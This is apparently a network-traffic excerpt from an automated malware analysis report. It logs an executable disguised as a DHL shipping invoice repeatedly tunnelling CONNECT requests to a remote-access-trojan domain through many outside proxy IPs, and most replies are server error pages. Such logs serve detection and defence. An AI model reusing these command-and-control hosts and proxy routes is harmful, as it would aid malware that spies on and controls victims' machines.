                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:03.719966888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1103192.168.2.45334495.111.237.46457386484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.607110977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1104192.168.2.45334679.119.155.6380806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.608500004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1105192.168.2.45336149.13.131.163806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.611994982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1106192.168.2.451414200.108.190.11098006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.631279945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1107192.168.2.453338219.73.88.167806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.634064913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1108192.168.2.45336365.109.203.176806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.634814978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.823492050 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1109192.168.2.45336545.7.177.10522466484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.661370039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1110192.168.2.453339103.221.220.22450696484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.661978006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1111192.168.2.453393162.159.242.230806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.733947039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.821194887 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1112192.168.2.45339831.43.179.214806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.735174894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.823343992 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1113192.168.2.453257117.160.250.163806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.738729954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.236334085 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1114192.168.2.45336784.39.112.14431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.739070892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1115192.168.2.453342202.162.219.1010806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.742101908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1116192.168.2.45340223.134.94.24580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.742221117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1117192.168.2.451532198.49.68.80806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.744232893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.765727997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.859713078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.266796112 CET536INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:11 GMT
                            Server: Apache
                            Content-Length: 663
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 64 66 67 68 68 73 64 66 67 68 40 61 73 64 66 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at dfghhsdfgh@asdf.com to inform them of the time this e
                            Mar 12, 2024 08:37:11.266875029 CET303INData Raw: 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20
                            Data Ascii: rror occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1118192.168.2.453218117.160.250.163816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.744441986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.274930954 CET221INHTTP/1.1 403 Access Denied
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Connection: close
                            Cache-Control: no-store
                            Content-Type: text/html
                            Content-Language: en
                            Content-Length: 43
                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                            Data Ascii: You are not allowed to access the document.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1119192.168.2.453444185.162.231.254806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.744930029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.832027912 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1120192.168.2.453453104.22.37.236806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.752207994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.062550068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.152206898 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1121192.168.2.453447104.16.107.142806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.752242088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.062526941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.152165890 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1122192.168.2.453358102.132.54.3480806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.754036903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1123192.168.2.453360203.160.61.10441456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.773185968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1124192.168.2.45340181.19.141.20985066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.773617983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1125192.168.2.453403177.234.245.249322136484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.781126022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1126192.168.2.453410162.214.225.223361296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.783296108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1127192.168.2.453377185.110.190.99806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.784173965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.971720934 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1128192.168.2.45334864.227.134.208806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.785273075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.562557936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.191385031 CET806INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:10 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 614
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
